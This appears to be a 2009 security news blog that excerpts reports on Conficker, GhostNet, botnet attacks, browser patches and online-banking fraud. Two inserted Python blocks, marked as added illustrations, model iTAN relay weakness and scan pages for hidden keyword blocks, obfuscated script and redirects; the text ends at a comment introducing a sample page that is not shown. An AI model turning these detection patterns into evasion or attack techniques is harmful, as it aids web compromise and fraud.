Saturday, March 28, 2009

U.S. Toll in Iraq, Afghanistan

Iraq And Afghanistan statistics via The Boston Globe (AP).

As of Saturday, March 28, 2009, at least 4,262 members of the U.S. military had died in the Iraq war since it began in March 2003, according to an Associated Press count.

The figure includes eight military civilians killed in action. At least 3,425 military personnel died as a result of hostile action, according to the military's numbers.

The AP count is one fewer than the Defense Department's tally, last updated Friday at 10 a.m. EDT.

As of Saturday, March 28, 2009, at least 599 members of the U.S. military had died in Afghanistan, Pakistan and Uzbekistan as a result of the U.S. invasion of Afghanistan in late 2001, according to the Defense Department. The department last updated its figures Friday at 10 a.m. EDT.

Of those, the military reports 442 were killed by hostile action.

More here and here.

And as always, the Iraq Coalition Casualty Count keeps the grim watch on their website here.

Honor the Fallen.

30 Year Anniversary of The Three Mile Island Accident

Three Mile Island Nuclear facility

Thirty years ago today...

- ferg

Israeli Company Uses Botnet to Attack Hezbollah Website

Oded Yaron writes on Ha'aretz:

Last week, while trying out breaking-in tools developed by Chinese hackers, an Israeli network security company, Applicure, brought down the Hezbollah Web site, using no more than 10 bots, which are computers controlled by hackers.

Reports of hackers taking out Web sites by bombarding them with massive amounts of information commonly appear in the news media. But often it's hard to estimate both the magnitude of the phenomenon and the ease with which even laymen can use existing web tools.

Those attacks geared at bringing down Web sites are known as either denial of service attacks (DoS) or distributed denial of service attacks (DDoS), and make use of Botnet networks - large networks of unsuspecting computer users hijacked by hackers with viruses and Trojan horses. According to Chinese CERT (Computer Emergency Response Team), the threat on China's internal network has multiplied by 20 in 2007.

More here.

Hat-tip: The Dark Visitor

ICANN Continues Collaborative Response to Conficker Worm

Via The ICANN Blog.

The Conficker worm that has infected hosts across the Internet continues to evolve. At this point, we do not believe cause exists for general alarm, but the Internet community must continue to take action against Conficker. ICANN continues to engage in collaborative efforts with security researchers, software & anti-virus vendors and with registries and registrars throughout the DNS community to disseminate information about how the malicious code may seek to leverage the DNS system.

The initial variants of the worm, Conficker A/B, focused on potentially utilizing a limited number of domain names to control the infected computers. The affected registrars have collaborated to block the control of this variant of the worm over the past two months. A new variant, Conficker C, has been identified. This variant is more complex and presents increased mitigation challenges. Among these challenges, Conficker C seeks to use a wider range of domain names across the DNS, involving many more names in across a greater number of registries. Analysis indicates the Conficker C code will become active on April 1st. ICANN is working with the security, vendor and DNS communities in an effort to proactively inform those involved registries who might be affected with specific information that will enable them to block the use of the DNS to control the infected computers. Through the outreach, the registry community is now in close contact with the Conficker working group and taking actions appropriate to their particular situations. An important note regarding April 1st : While the Conficker C code may become active on this date, the DNS and the Internet will likely not see a sudden wave of disruption or activity from the infected computers. Lack of activity on April 1st does not mean the millions of infected computers have been cleaned up or that efforts to mitigate the control of these computers can stop.

The cooperation to stop the spread of the Conficker worm and block control of the infected computers has become a major effort involving well over 100 organizations. The collaborative has conducted shared technical analysis and passed information resulting in practical, proactive steps to limit control and stop the spread of the worm. ICANN will continue its efforts with the security and DNS communities and sees this effort as a model for effective global response to situations that challenge the security and stability of the Internet and the DNS. We also want to encourage individuals and organizations who are concerned about removing the malicious code and to contribute to disabling Conficker to visit for information regarding what can be done.


'Act Locally, Pwn Globally'

Jeffrey Carr writes on SecurityFocus:

We need to change the game. We need an international effort to mandate verification of registration information for all Internet services and products. Even ICANN has been too lax in its verification procedures, according to a 2005 U.S. General Accountability Office study which found that eight percent of all domains had at least one instance of obviously false WHOIS information.

Moving up from ICANN, we need to hold large hosting companies responsible for criminal behavior on their leased sites. In other words, enforce their terms-of-service agreement. lists the top ten infected network blocks responsible for the world's badware. SoftLayer Technologies comes in at number seven with 3,507 infected sites, followed by The Planet, another Plano, TX company, at number eight with 3,166 infected sites.

Finally, we need a commitment from governments to provide no safe harbors for cyber criminals and cooperate in international investigations. One way to start the process would be to form a world body solely for the purpose of building the cooperative networks needed to initiate and complete international network forensic investigations.

More here.

Vast Electronic Spy System Loots Computers in 103 Countries

John Markoff writes in The New York Times:

A vast electronic spying operation has infiltrated computers and has stolen documents from hundreds of government and private offices around the world, including those of the Dalai Lama, Canadian researchers have concluded.

In a report to be issued this weekend, the researchers said that the system was being controlled from computers based almost exclusively in China, but that they could not say conclusively that the Chinese government was involved.

The researchers, who are based at the Munk Center for International Studies at the University of Toronto, had been asked by the office of the Dalai Lama, the exiled Tibetan leader whom China regularly denounces, to examine its computers for signs of malicious software, or malware.

Their sleuthing opened a window into a broader operation that, in less than two years, has infiltrated at least 1,295 computers in 103 countries, including many belonging to embassies, foreign ministries and other government offices, as well as the Dalai Lama’s Tibetan exile centers in India, Brussels, London and New York.

The researchers, who have a record of detecting computer espionage, said they believed that in addition to the spying on the Dalai Lama, the system, which they called GhostNet, was focused on the governments of South Asian and Southeast Asian countries.

More here.

Friday, March 27, 2009

NOVA: Extreme Ice

If you missed this NOVA special episode, you can catch it all online here.

This should really scare the shit out of you -- climate change is real, and is accelerating at rates that most people cannot imagine, and do not know about.

Word to the wise... this is real. And this will change everything.

- ferg

Indian Army Fears China Attack by 2017

Via The Daily Times (Pakistan).

The Indian military fears a ‘Chinese aggression’ in less than a decade, the Hindustan Times has reported, and claimed that a secret exercise – called ‘Divine Matrix’ – by the army’s military operations directorate has visualised a war scenario with the nuclear-armed neighbour before 2017.

“A misadventure by China is very much within the realm of possibility with Beijing trying to position itself as the only power in the region. There will be no nuclear warfare but a short, swift war that could have menacing consequences for India,” said an army officer, who was part of the three-day war games that ended on Wednesday. In the military’s assessment, based on a six-month study of various scenarios before the war games, “China would rely on information warfare (IW) to bring India down on its knees before launching an offensive”, the report claimed.

The war games saw generals raising concerns about the IW battalions of the People’s Liberation Army (PLA) carrying out hacker attacks for military espionage, intelligence collection, paralysing communication systems, compromising airport security, inflicting damage on the banking system and disabling power grids. “We need to spend more on developing information warfare capability,” he said. The war games dispelled the notion that China would take at least one year for a substantial military build-up across India’s northeastern frontiers. “The Tibetan infrastructure has been improved considerably. The PLA can now launch an assault very quickly, without any warning,” said the officer.

More here.

Hat-tip: InfoSec News

Friday Monkey Blogging: Monkey Kills Task-Master Owner - With a Well-Aimed Coconut

As I mentioned a few months ago, I started a regularly recurring blog entry meme every Friday afternoon, inspired by Bruce Schneier's regular series of "Friday Squid Blogging" posts, and my very own maddening Monkey Theory.

Here is this week's installment.

Andrew Drummond writes on the Daily Mail:

A monkey who tired of being forced to climb trees to pick coconuts killed his owner with a well-aimed coconut.

The owner died immediately from the monkey's throw from the top of a tree in the Thai Province of Nakorn Sri Thammarat, according to the Samui Express newspaper.

The newspaper said that Leilit Janchoom, 48, had beaten the monkey whenever he showed any hesitance to climb a tree.

The owner was insistent because he got the equivalent of 4p for every coconut picked.

But the monkey - it is claimed - apparently found the work boring, strenuous and unrewarding.

More here.

Image source: Daily Mail

Firefox 3.0.8 Released

Fixed in Firefox 3.0.8:

MFSA 2009-13 Arbitrary code execution through XUL element
MFSA 2009-12 XSL Transformation vulnerability

Get it.

- ferg

In Passing: Irving R. Levine

Irving R. Levine
August 26, 1922 - March 27, 2009

Fears of a Conficker Meltdown Greatly Exaggerated

Robert McMillan writes on PC World:

Worries that the notorious Conficker worm will somehow rise up and devastate the Internet on April 1 are misplaced, security experts said Friday.

Conficker is thought to have infected more than 10 million PCs worldwide, and researchers estimate that several million of these machines remain infected. If the criminals who created the network wanted to, they could use this network to launch a very powerful distributed denial of service (DDoS) attack against other computers on the Internet.

April 1 is the day that the worm is set to change the way it updates itself, moving to a system that is much harder to combat, but most security experts say that this will have little effect on most computer users' lives.

That hype will probably intensify when the U.S. TV newsmagazine 60 Minutes airs a report Sunday on Conficker, entitled "The Internet is Infected."

More here.

UK: Houses of Parliament Computers Infected with Conficker Virus

Matthew Moore writes on The Telegraph:

The Houses of Parliament IT system has become infected with the Conficker computer virus, it has emerged, raising questions about possible security flaws at the Palace of Westminster.

The worm virus, which has affected more than 15 million computers around the world, has become established on computers used by MPs, Lords and parliamentary staff.

Known variously as Conficker, Downadup, and Kido, it buries itself deep inside a PC's Windows operating system, from where it can be used by hackers to steal users' passwords and personal information.

Although it is not clear when or how the machines became infected, there were claims last night that parliament had failed to follow standard online security procedures.

An email sent to parliamentary staff alerting them to the infection – seen by Channel 4 News – warned employees to stop running unauthorised machines on the network, indicating that this had previously been allowed. Most large firms only allow secured computers to plug in to their networks.

More here.

Thursday, March 26, 2009

Firefox Fix Due Next Week After Attack Is Published

Robert McMillan writes on PC World:

Online attack code has been released targeting a critical, unpatched flaw in the Firefox browser.

The attack code, written by security researcher Guido Landi was published on several security sites Wednesday, sending Firefox developers scrambling to patch the issue. Until the flaw is patched, this code could be modified by attackers and used to sneak unauthorized software onto a Firefox user's machine.

Mozilla developers have already worked out a fix for the vulnerability. It's slated to ship in the upcoming 3.0.8 release of the browser, which developers are now characterizing as a "high-priority firedrill security update," thanks to the attack code. That update is expected sometime early next week.

"We... consider this a critical issue," said Mozilla Director of Security Engineering Lucas Adamski in an email.

The bug affects Firefox on all operating systems, including Mac OS and Linux, according to Mozilla developer notes on the issue.

More here.

Wednesday, March 25, 2009

Mark Fiore: Leverage Me Tender

More Mark Fiore brilliance.

Via The San Francisco Chronicle.

Connecting-the-dots: Hopping Mad!

- ferg

The Fourth Front: Russia's Cyber-Attack on Georgia

David J. Smith writes on Georgian Daily:

According to Tkeshelashvili, “DDoS attacks began in the weeks before the Russian invasion and continued even after the Kremlin announced that it had ceased hostilities.” The attacks blocked Internet communications, crippled Georgian government fileservers, defaced websites, established counterfeit sites and degraded telephonic communications, she said.

Private analysts add that fraudulent transaction attempts overwhelmed Georgian bank computers, spurring foreign commercial institutions to cut links with Georgia in self-defense.

Of course, one of the advantages of cyber-war is that it is hard to trace. But no one believes that a gaggle of Indonesian teenagers or Colombian narcotraficantes struck Georgia through the Ethernet just as Russian tanks prepared to strike through the Roki Tunnel.

Moreover, the attack was too well coordinated to come from Russian “hacktivists” alone, although many such individual malefactors took their cues from certain malicious Russian sites.

More here.

'Mafiaboy' to Headline IT 360

Michael Calce, a.k.a. "Mafiaboy"

Jennifer Kavur writes on IT World Canada:

As a 15-year-old, he brought down some of the highest profile sites on the Web. Eight months of detention and eight years of silence later, Michael Calce discusses what the good guys can learn from the black hats.

The infamous 15-year-old hacker who successfully launched a series of denial-of-service attacks in early 2000 that brought down Yahoo, Amazon, eBay and CNN, among others, is coming to Toronto next month.

The attacks, which took the FBI and RCMP two months to trace back to the Montreal high school student, led Michael “Mafiaboy” Calce to plead guilty to 55 counts of mischief, serve eight months juvenile detention and remain silent for eight years.

Calce, now a 23-year-old security consultant, agreed to his first media interview last fall. This coincided with the release of his book, Mafiaboy: How I Cracked the Internet and Why It's Still Broken, which Calce co-authored with journalist Craig Silverman.

But the former hacker hasn't stopped attracting controversy.

More here.

Java Runtime Environment 6.0 Update 13

Via the SANS Internet Storm Center.

JRE 6.0 Update 13 has been released and addresses a couple of security issues. You can see the release notes for this version here. If you have a business case for remaining on the older JRE 5.0 version, Update 18 for it has been released as well. You can see the release notes for it here.

Both of these updates address various security issues.


Get it.

- ferg

U.S. Senator Asks DHS for Cyber Security Documents

Stephanie Condon writes on C|Net News:

The top Republican on the Senate Homeland Security Committee is requesting detailed information, including financial figures, from the U.S. Department of Homeland Security to explain why the department has been seemingly unable to fulfill its cybersecurity responsibilities.

In a letter sent to DHS Secretary Janet Napolitano on Tuesday, Sen. Susan Collins (R-Maine) said that in light of the recent resignation of National Cybersecurity Center Director Rod Beckström, she would like DHS to send the Homeland Security Committee a number of documents to show how the department spent its $6 million NCSC budget and provided other means of support for the NCSC.

In a resignation letter turned in earlier this month, Beckström said, "the NCSC did not receive appropriate support inside DHS during the last administration to fully realize (its) vital role."

Collins said in her letter to Napolitano that she was very concerned by Beckström's assertion, especially given the authority the NCSC has been granted.

More here.

SCADA Watch: FERC Seeks to Close Cyber-Security 'Gaps' at Nuclear Plants

Jacob Goodwin writes on Government Security News:

The Federal Energy Regulatory Commission wants to ensure that when new security regulations related to nuclear power plants come into effect, no security “gap” is created that would leave portions of the nuclear plants unprotected from cyber-attacks.

To that end, the FERC issued a “clarification” on March 25 that indicated that those portions of a nuclear power plant that were specifically exempted from tighter security procedures in the forthcoming regulations from the Nuclear Regulatory Commission (NRC), are nonetheless still required to adhere to what are known as Critical Infrastructure Protection (CIP) Reliability Standards.

“Thus, to assure that there is no ‘gap’ in the regulatory process, the [FERC] clarifies that the ‘balance of plant’ equipment within a nuclear power plant in the United States that is not regulated by the NRC is subject to compliance with the CIP Reliability Standards,” said FERC, in a notice published in the Federal Register.

More here.

Researcher to Blow Lid Off 'Secure' Retail Networks

Danny Bradbury writes on InfoSecurity US:

Next month, a security researcher will unveil a hack that he says could provide backdoor access into thousands of US networks. Rob Havelt, practice manager for the Spider Labs penetration testing laboratory within security firm Trustwave, will demonstrate how to hack into the frequency hopping spread spectrum (FHSS) networks that underpin everything from barcode scanning systems in retail through to some mobile IP phones.

Havelt, who will reveal more information at Blackhat Europe in mid April, said that the FHSS networks commonly employed by systems such as Motorola's Symbol product range have commonly been perceived as secure.

"FHSS used to be seen as a security mechanism as well as a way for these things to talk to each other, because it channel hops across the spectrum, so it never lingers on a single channel for a few milliseconds," he said. "Consequently, a lot of organizations that deployed FHSS networks don't follow the same security practices as they do with other wireless networks."

Frequency hopping isn't entirely random, he warned. The hop pattern, along with information such as the system ID, is broadcast in advance from the network access point in the form of beacon frames, which can be sniffed over the network.

More here.

UK e-Crime Fight Hindered by Lack of Cash

Jeremy Kirk writes on TechWorld:

A new UK police force dedicated to tracking down cybercriminals is gearing up to make the most of what one senior police official acknowledges is limited funding.

The Police Central e-crime Unit, due to begin operations soon, came to be as part of a comprehensive overview of how the UK handles fraud and e-crime after years of criticism that the government wasn't doing enough.

The unit will receive £7 million ($10 million) in funding over the next three years from the Home Office and Metropolitan Police.

"This is not a lot of money," said Janet Williams, deputy assistant commissioner in the Specialist Crime Directorate of the Metropolitan Police Service, during a presentation at the E-crime Congress in London on Wednesday.

Overall, the strategy for dealing with e-crime will be increased training for law enforcement, linking different law enforcement agencies and allying with private industry.

Of the 43 police forces in England and Wales, "only a handful of high-tech investigators" are in those jurisdictions, Williams said. Additionally, it's likely that specific computer forensics equipment would have to be shared between jurisdictions.

More here.

Security Fears Cutting Into E-Commerce Biz

Matt Hines writes on the eWeek "Security Watch" Blog:

Experts have been saying for years that the influx of online malware attacks and related identity theft would eventually have a negative impact on consumers' willingness to shop over the Web, but a new research report issued by Javelin Strategy & Research has actually put some numbers behind the theory.

In fact, according to the Javelin survey of U.S. consumers, e-commerce vendors may have lost as much as $21 billion in online sales during 2008 based primarily on information security concerns. The company interviewed roughly 2,000 people over the phone and online during Dec. 2008 to reach its conclusions.

Unsurprisingly, those individuals who had already been victimized by identity thieves or other cyber-criminals were among the most likely to have abandoned e-commerce sites, with 12 percent of those respondents indicating that they no longer shop online at all, and another 25 percent telling Javelin that they have at least cut back on their purchases. Some 19 percent of the affected respondents said that they spend less money when shopping as a result of their experiences.

Of all those surveyed, 40 percent replied that they will only shop at major brand sites, such as, based on fears of ID theft.

Despite the negative findings, which also included the fact that some 45 percent of e-shoppers were dissatisfied with some element of the online buying experience, the report also concludes that e-commerce companies can incent buyers to view their services more positively if they can assure that personal information is processed safely (83 percent) and offer enhanced security measures (80 percent). Another concept popular with shoppers was the willingness of sites to offer zero liability against ID theft for their customers (81 percent).

More here.

Ex-British Spy Advocates Greater Access to Personal Data

A Reuters newswire article, via eWeek, reports that:

Security at the G20 summit next week will rest in part on Britain's pervasive closed circuit cameras, but in the future pre-emptive surveillance could extend to the entire country's personal data.

That is the vision outlined by former security chief David Omand in a study of intelligence methods seen by privacy campaigners as a plan for a vast breach of human rights.

"Finding out other people's secrets is going to involve breaking everyday moral rules," he said in the paper for the Institute of Public Policy Research, an influential think tank.

"Application of modern data mining and processing techniques does involve examination of the innocent as well as the suspect to identify patterns of interest for further investigation."

In an interview, Omand said: "If you have the advantage of pre-emptive intelligence, then you are able to use the rapier, not the bludgeon, of state power."

More here.

Panda Releases Free Security Tool for Autorun

Erik Larkin writes on the PC World "Security Alert" Blog:

Panda, an antivirus software company, has a new free Panda USB Vaccine available for download that can disable the Windows Autorun feature for an entire PC or a particular USB drive.

The Autorun feature in Windows can make it easier to install software - and it can also be exploited by malware like the Conficker worm, which co-opts the feature to spread itself. I've previously written about the risk, and turning off Autorun can be a good idea for better computer security.

To download this small tool you'll have to first give Panda your e-mail address and opt-out of receiving marketing e-mails (unless you want them), but it's a quick download after that and doesn't require installation. When you run it, you can click a button to vaccinate your computer (disabling Autorun), and you can then click the button again to turn Autorun back on.

More here.

Cisco Releases Multiple Security Advisories for IOS Vulnerabilities


Cisco has released multiple security advisories to address vulnerabilities in IOS Software. These vulnerabilities may allow an attacker to cause a denial-of-service condition, interfere with network traffic, or operate with escalated privileges.

US-CERT encourages users and administrators to review the following Cisco security advisories and apply any necessary workarounds or updates to help mitigate the risks.


Tuesday, March 24, 2009

'The Analyzer' Hack Probe Widens - $10 Million Allegedly Stolen From U.S. Banks

Ehud Tenenbaum in 1998.

Kim Zetter writes on Threat Level:

Ehud Tenenbaum, an Israeli hacker arrested in Canada last year for allegedly stealing about $1.5 million from Canadian banks, also allegedly hacked two U.S. banks, a credit and debit card distribution company and a payment processor in what U.S. authorities are calling a global "cashout" conspiracy.

The U.S. hacks have resulted in at least $10 million in losses, according to court records obtained by Threat Level, and are just part of a larger international conspiracy to hack financial institutions in the United States and abroad.

The broadened case highlights the continued vulnerability of U.S. financial networks to cybercrime, despite supposedly tight industry security standards. It comes on the heels of other multimillion-dollar heists that also breached the security protecting ATM codes and account information. In late 2007, criminals used four hacked iWire payroll cards to steal $5 million from ATMs around the world in just two days. Shortly thereafter, a processing server that handles withdrawals from Citibank-branded ATMs at 7-Eleven convenience stores was cracked, leading crooks to converge on New York to withdraw at least $2 million from Citibank accounts using the stolen ATM data. And a carefully coordinated global heist last November resulted in a one-day haul of $9 million in cash, following a breach at payment processor RBS WorldPay.

Tenenbaum, 29, made headlines a decade ago under his hacker handle "The Analyzer" for penetrating Pentagon computers and other networks. He'd been living in France, and had only been in Canada about five months on a six-month visitor's permit when he was arrested last August in Calgary with three alleged accomplices for allegedly hacking into Direct Cash Management, a Calgary company that distributes prepaid debit and credit cards. A Canadian court granted him CDN $30,000 bail, but before he could be released from jail, U.S. authorities swooped in with a provisional warrant to retain him in custody while they pursued an indictment and extradition.

More here.

Image source: Gary Warner

China Becoming the World's Malware Factory

Robert McMillan writes on PC World:

With China's economy cooling down, some of the country's IT professionals are turning to cybercrime, according to a Beijing-based security expert.

Speaking at the CanSecWest security conference last week, Wei Zhao, CEO of Knownsec, a Beijing security company, said that while many Chinese workers may be feeling hard times, business is still booming in the country's cybercrime industry. "As the stock market dropped like a stone, a lot of IT professionals lost lots of money on the stock market," he said. "So sometimes they sell 0days," he said, referring to previously unknown software bugs.

"China is not only the world's factory, but also the world's malware factory," Zhao said.

China's red-hot economy has been hit by the global recession, and while the economy is still growing, technology companies such as Intel, Motorola and Lenovo have all laid off employees in China in recent months.

Last December, Chinese hackers found a previously undisclosed 0day vulnerability in Internet Explorer. When employees of Zhao's company inadvertently published details of the bug on a public forum, Microsoft was sent scrambling to patch the issue.

More here.

Canadian Police: Criminals Love The BlackBerry's Wiretap-Proof Ways


Wireless messages sent on a BlackBerry are so hard to intercept that the smartphones have become the device of choice for both criminals and law enforcement, police say.

While some police admit that level of security makes the BlackBerry their preferred handheld device, they also say that also makes it hard for them to listen in on suspected criminals.

"It does limit our abilities to intercept, which in turn minimizes our abilities to prevent the crimes," said Supt. Pat Fogerty of the Combined Forces Special Enforcement Unit of British Columbia, a division of the Royal Canadian Mounted Police.

The problem is that BlackBerry smartphones, designed by Waterloo, Ont.-based Research In Motion initially for corporate clients, run software called the BlackBerry Enterprise Server that creates a secure and private network and encrypts data.

Police say criminals are using additional layers of encryption with other types of software, bringing the encryption level up to military grade.

More here.

German Police: Two-factor Authentication Failing

Jeremy Kirk writes on PC World:

A two-factor authentication system widely used in Germany is failing to stop cybercriminals from draining bank accounts, a top German law enforcement official said Tuesday.

As of last year, about 95 percent of German online banking patrons were using "iTan" codes, random secret numbers that are requested of a bank customer during an online transaction, said Mirko Manske, detective chief superintendent for Germany's Federal Criminal Police Office.

The iTan code is used as an additional measure of authentication besides the customer's login information. The iTan code can only be used once and is intended to thwart online banking attacks where an attacker has all the other customer information.

But "it does not work," said Manske during a presentation at the E-crime Congress in London. "We are still losing money."

The problem is that hackers have figured out ways to execute transactions in real time, utilizing the iTan code and making the security control essentially useless.

More here.
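As an added illustration, not from the article and not any bank's software, of why a one-time indexed TAN fails against transfers executed in real time: a toy Python model in which the iTAN only proves possession of the TAN list and says nothing about the transfer being approved, beside a transaction-bound variant (assumed here to be an HMAC over index and transfer details, which goes beyond what the article covers) that refuses an altered transfer. All customer names, TAN codes and secrets are constructed.

```python
"""Toy model of indexed-TAN (iTAN) authorisation. Constructed example, not any
bank's real protocol: an iTAN proves the customer holds the TAN list but is not
tied to the transfer, so a code relayed in real time approves whatever transfer
the session actually carries. The bound variant is the general fix."""
import hashlib
import hmac
from dataclasses import dataclass


@dataclass(frozen=True)
class Transfer:
    recipient: str
    amount_cents: int


class Bank:
    """Shared flow: one-time indices, a ledger, and a code check."""

    def __init__(self, credentials):
        self.credentials = credentials    # customer -> TAN list or device secret
        self.used = {c: set() for c in credentials}
        self.counter = {c: 0 for c in credentials}
        self.ledger = []                  # (customer, executed transfer)

    def challenge(self, customer):
        """Index the customer must answer with in this session."""
        index = self.counter[customer]
        self.counter[customer] += 1
        return index

    def expected_code(self, customer, index, transfer):
        raise NotImplementedError

    def confirm(self, customer, transfer, index, code):
        if index in self.used[customer]:
            return False                  # every index is single-use
        expected = self.expected_code(customer, index, transfer)
        if not hmac.compare_digest(expected, code):
            return False
        self.used[customer].add(index)
        self.ledger.append((customer, transfer))
        return True


class ITanBank(Bank):
    """Printed TAN list: the expected code depends on the index only, never on
    `transfer`, so whatever transfer the session carries is executed."""

    def expected_code(self, customer, index, transfer):
        return self.credentials[customer][index]


def bound_code(secret, index, transfer):
    """Code over index AND transfer details (assumed HMAC construction)."""
    msg = f"{index}|{transfer.recipient}|{transfer.amount_cents}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()[:8]


class BoundTanBank(Bank):
    """Device-generated code bound to the transfer the customer saw: a transfer
    altered in transit no longer matches and is refused."""

    def expected_code(self, customer, index, transfer):
        return bound_code(self.credentials[customer], index, transfer)


def session(bank, customer, seen, carried, code_for):
    """One session. `seen` is the transfer the customer approves; `carried` is
    what the bank receives (the same in a clean session, different when the
    traffic is rewritten in real time). Returns True if `carried` executed."""
    index = bank.challenge(customer)
    return bank.confirm(customer, carried, index, code_for(index, seen))


def demo_itan():
    """iTAN: the rewritten transfer executes; replaying the code does not."""
    tans = ["483920", "110293", "998812"]  # constructed TAN list
    bank = ITanBank({"alice": tans})
    seen, carried = Transfer("landlord", 50000), Transfer("mule", 50000)
    executed = session(bank, "alice", seen, carried, lambda i, t: tans[i])
    replay = bank.confirm("alice", carried, 0, tans[0])
    return executed, bank.ledger[-1][1].recipient, replay


def demo_bound():
    """Bound code: the rewritten transfer is refused, the honest one executes."""
    secret = b"constructed-per-device-secret"
    bank = BoundTanBank({"alice": secret})
    seen, carried = Transfer("landlord", 50000), Transfer("mule", 50000)
    gen = lambda i, t: bound_code(secret, i, t)
    rejected = session(bank, "alice", seen, carried, gen)
    honest = session(bank, "alice", seen, seen, gen)
    return rejected, honest, bank.ledger[-1][1].recipient
```

The single-use check stops replay of a captured iTAN, but only the bound code ties the approval to the recipient and amount the customer actually saw.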

Monday, March 23, 2009

Australia: Hacked Filter Reveals Blacklist in 30 Seconds

Brett Winterford writes on

A 30-second hack of a NetAlert-approved family-friendly filter exposes a list of websites banned in Australia.

The vulnerability, leaked to iTnews over the weekend and verified by IT security consultants, is due to a flaw in the Integard internet filtering software developed by Brisbane's Race River Corporation.

A source claimed to iTnews that Integard can be reverse-engineered with a hex editor to reveal material the software is designed to keep secret.

iTnews asked three IT security specialists for their opinions.

They all refused to go on the record but they said the list of banned URLs is exposed in a process that takes about 30 seconds.

More here.

Creative Spammers

Click for larger image.

I found this in my GMail spam-box tonight.

Luckily, GMail already knew about it, and classified it as spam, but admittedly this is a new one on me -- I've never seen this sort of graphic spam exercise before.

Sure, I've seen a lot of them, but not this particular method.


- ferg

New Zealand: TelstraClear Hires Teen Bot Master

Owen Walker

Michael Field writes on The Age:

TelstraClear, Telstra's New Zealand subsidiary, has hired one of the world's best known hackers - a teenager known as "Akill".

Nineteen-year-old Owen Thor Walker became the subject of a US Federal Bureau of Investigation (FBI) cyber crime investigation spanning the United States, Europe and New Zealand and dubbed "Bot Roast".

New Zealand police finally caught him last year and he admitted to being the ring-leader, code-named Akill, of a group known as the A-Team.

Starting as a 16-year-old at school, Mr Walker designed and planted "botnets" which are a network of hacked computers able to be controlled via the internet by a single computer.

He came up with a system that beat anti-virus software; it spread automatically and it destroyed rival bot codes.

His botnet reached at least 1.3 million computers.

He pleaded guilty to six cyber crime charges but when he ended up in the High Court in Hamilton Justice Potter did not convict him but ordered him to pay a share in damage caused to hacked computers and to stay off computers.

More here.

Image source: The Age / Iain McGregor / Waikato Times

Space Storm Alert: 90 Seconds From Catastrophe

Michael Brooks writes on New Scientist:

It is midnight on 22 September 2012 and the skies above Manhattan are filled with a flickering curtain of colourful light. Few New Yorkers have seen the aurora this far south but their fascination is short-lived. Within a few seconds, electric bulbs dim and flicker, then become unusually bright for a fleeting moment. Then all the lights in the state go out. Within 90 seconds, the entire eastern half of the US is without power.

A year later and millions of Americans are dead and the nation's infrastructure lies in tatters. The World Bank declares America a developing nation. Europe, Scandinavia, China and Japan are also struggling to recover from the same fateful event - a violent storm, 150 million kilometres away on the surface of the sun.

It sounds ridiculous. Surely the sun couldn't create so profound a disaster on Earth. Yet an extraordinary report funded by NASA and issued by the US National Academy of Sciences (NAS) in January this year claims it could do just that.

Over the last few decades, western civilisations have busily sown the seeds of their own destruction. Our modern way of life, with its reliance on technology, has unwittingly exposed us to an extraordinary danger: plasma balls spewed from the surface of the sun could wipe out our power grids, with catastrophic consequences.

More here.

Hacked Web Pages Hauls Estimated at $10,000 a Day

Shaun Nichols writes on

The recent wave of search engine optimised web attacks is netting a huge cash haul for hackers and malware vendors, according to researchers.

Security firm Finjan claimed that a single hacker can make as much as $10,800 (£7,400) a day by embedding compromised web pages with links to attack sites and lists of popular search terms.

Finjan chief technology officer Yuval Ben-Itzhak said that the company recently observed a single attack operation involving a set of compromised pages that redirected to a site pushing a rogue anti-virus program.

The attackers had compromised a series of pages which were then embedded with lists of popular search terms collected from services such as Google Trends or current news items. The same pages were then injected with obfuscated code that redirected to the attack page, which used fake alert boxes to convince the user to download and purchase the bogus security software for $50 (£34).

Over a period of 16 days, Finjan recorded some 1.8 million hits from the infected pages. Between seven and 12 per cent of the victims actually downloaded and installed the software, and roughly 1.79 per cent paid the $50 fee.

More here.
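The injected pages Finjan describes have two things in common: a block of popular search terms kept out of the visitor's sight, and obfuscated script that sends visitors arriving from a search engine on to the rogue anti-virus site. The scanner below is an added example, not Finjan's tooling or vnunet's; it walks a page with Python's html.parser, counts text and links inside hidden containers, and looks for obfuscation and redirect patterns in script bodies. Thresholds and regexes are this example's own choices, and both sample pages are constructed.

```python
import re
from html.parser import HTMLParser

# Indicator patterns are this example's own choices, not Finjan's.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}px", re.I)
OBFUSCATION = re.compile(r"unescape\s*\(|eval\s*\(|String\.fromCharCode", re.I)
ESCAPED_RUN = re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}){8,}", re.I)
REDIRECT = re.compile(r"(?:window\.|document\.|top\.)?location(?:\.href|\.replace)?\s*[=(]", re.I)
VOID_TAGS = {"meta", "link", "img", "br", "hr", "input"}


class _Collector(HTMLParser):
    """Walk the page once, remembering text and links inside hidden
    containers, script bodies, and meta-refresh headers."""

    def __init__(self):
        super().__init__()
        self.stack = []            # one is_hidden flag per open element
        self.hidden_depth = 0
        self.hidden_words = 0
        self.hidden_links = 0
        self.scripts = []
        self.meta_refresh = []
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh.append(a.get("content", ""))
        if tag in VOID_TAGS:
            return                 # no matching end tag will arrive
        self.stack.append(hidden)
        self.hidden_depth += hidden
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
        elif tag == "a" and self.hidden_depth:
            self.hidden_links += 1

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
        if tag not in VOID_TAGS and self.stack:
            self.hidden_depth -= self.stack.pop()

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data
        elif self.hidden_depth:
            self.hidden_words += len(data.split())


def scan_html(html):
    """Return {'suspicious': bool, 'findings': [...]} for one page."""
    c = _Collector()
    c.feed(html)
    c.close()
    findings = []
    if c.hidden_words >= 20 or c.hidden_links >= 5:
        findings.append(f"hidden block: {c.hidden_words} words, {c.hidden_links} links")
    for body in c.scripts:
        if OBFUSCATION.search(body) or ESCAPED_RUN.search(body):
            findings.append("obfuscated script")
        if REDIRECT.search(body):
            findings.append("script-driven redirect")
    for content in c.meta_refresh:
        findings.append(f"meta refresh: {content}")
    # A single hidden element is common on legitimate pages; the injected
    # pages in the article combine keyword stuffing with a redirect.
    return {"suspicious": len(findings) >= 2, "findings": findings}


# Constructed sample: a harmless page with the injection pattern added.
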